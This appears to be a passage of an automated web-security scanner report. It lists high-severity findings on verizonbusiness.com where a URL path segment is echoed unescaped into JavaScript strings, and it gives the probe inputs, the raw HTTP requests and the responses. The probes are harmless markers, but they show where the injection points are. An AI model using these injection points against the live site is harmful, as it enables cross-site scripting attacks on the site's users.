var request='/uk/solutions/var75025';a91d526cf44/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1121. http://www.verizonbusiness.com/us/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /us/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 588ef"%3bc50caadca2d was submitted in the REST URL parameter 1. This input was echoed as 588ef";c50caadca2d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /us588ef"%3bc50caadca2d/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:14 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40613
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:14 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:14 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
}
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/us588ef";c50caadca2d/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.1122. http://www.verizonbusiness.com/us/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /us/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload efa27'%3b98076ea682b was submitted in the REST URL parameter 1. This input was echoed as efa27';98076ea682b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /usefa27'%3b98076ea682b/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:28 GMT
Content-Type: text/html
Content-Length: 40613
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:28 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:28 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/usefa27';98076ea682b/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1123. http://www.verizonbusiness.com/us/solutions/var/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /us/solutions/var/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4212d'%3bc14296dd7ac was submitted in the REST URL parameter 1. This input was echoed as 4212d';c14296dd7ac in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /us4212d'%3bc14296dd7ac/solutions/var/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:04 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40643
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:04 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:04 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/us4212d';c14296dd7ac/solutions/var/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1124. http://www.verizonbusiness.com/us/solutions/var/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /us/solutions/var/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload abf11"%3b50f43ee870c was submitted in the REST URL parameter 1. This input was echoed as abf11";50f43ee870c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /usabf11"%3b50f43ee870c/solutions/var/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:53:55 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40641
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:53:55 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:55 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
}
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/usabf11";50f43ee870c/solutions/var/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.1125. http://www.verizonbusiness.com/us/solutions/var/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /us/solutions/var/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 124ca'%3b8c07802eca4 was submitted in the REST URL parameter 2. This input was echoed as 124ca';8c07802eca4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /us/solutions124ca'%3b8c07802eca4/var/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:46 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41611
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:46 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:46 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/us/solutions124ca';8c07802eca4/var/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1126. http://www.verizonbusiness.com/us/solutions/var/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /us/solutions/var/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21c4b"%3bd72783d0bad was submitted in the REST URL parameter 2. This input was echoed as 21c4b";d72783d0bad in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /us/solutions21c4b"%3bd72783d0bad/var/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:21 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41609
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:21 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:21 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/us/solutions21c4b";d72783d0bad/var/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT
...[SNIP]...

1.1127. http://www.verizonbusiness.com/us/solutions/var/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /us/solutions/var/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb104'%3bd264d24ebd8 was submitted in the REST URL parameter 3. This input was echoed as fb104';d264d24ebd8 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /us/solutions/varfb104'%3bd264d24ebd8/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:55:17 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 42821
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:55:17 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:55:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/us/solutions/varfb104';d264d24ebd8/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1128. http://www.verizonbusiness.com/us/solutions/var/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /us/solutions/var/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4420f"%3bfbbedaba720 was submitted in the REST URL parameter 3. This input was echoed as 4420f";fbbedaba720 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /us/solutions/var4420f"%3bfbbedaba720/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:55:03 GMT
Content-Type: text/html
Content-Length: 42821
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:55:03 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:55:03 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/us/solutions/var4420f";fbbedaba720/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.1129. http://www.verizonbusiness.com/us/support/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /us/support/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8689'%3ba48c3b28e32 was submitted in the REST URL parameter 1. This input was echoed as a8689';a48c3b28e32 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /usa8689'%3ba48c3b28e32/support/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:53:46 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40629
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:53:46 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:46 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/usa8689';a48c3b28e32/support/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1130. http://www.verizonbusiness.com/us/support/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /us/support/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 309dd"%3bb44e908e47e was submitted in the REST URL parameter 1. This input was echoed as 309dd";b44e908e47e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /us309dd"%3bb44e908e47e/support/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:53:36 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40629
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:53:36 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:53:36 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
}
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/us309dd";b44e908e47e/support/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUB
...[SNIP]...

1.1131. http://www.verizonbusiness.com/us/support/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /us/support/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec8a0'%3b8df033978ef was submitted in the REST URL parameter 2. This input was echoed as ec8a0';8df033978ef in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /us/supportec8a0'%3b8df033978ef/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:18 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41599
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:18 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:18 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/us/supportec8a0';8df033978ef/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1132. http://www.verizonbusiness.com/us/support/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /us/support/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a47ff"%3b26b7c2d468a was submitted in the REST URL parameter 2. This input was echoed as a47ff";26b7c2d468a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /us/supporta47ff"%3b26b7c2d468a/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:54:02 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41597
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:54:03 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:54:02 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/us/supporta47ff";26b7c2d468a/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.1133. http://www.verizonbusiness.com/ve/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /ve/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 89282'%3bbca35e56ebc was submitted in the REST URL parameter 1. This input was echoed as 89282';bca35e56ebc in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ve89282'%3bbca35e56ebc/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 01:01:15 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 47571
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 01:01:15 GMT
Connection: close
Expires: Mon, 16 Nov 2009 19:01:15 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/ve89282';bca35e56ebc/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1134. http://www.verizonbusiness.com/ve/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /ve/

Issue detail

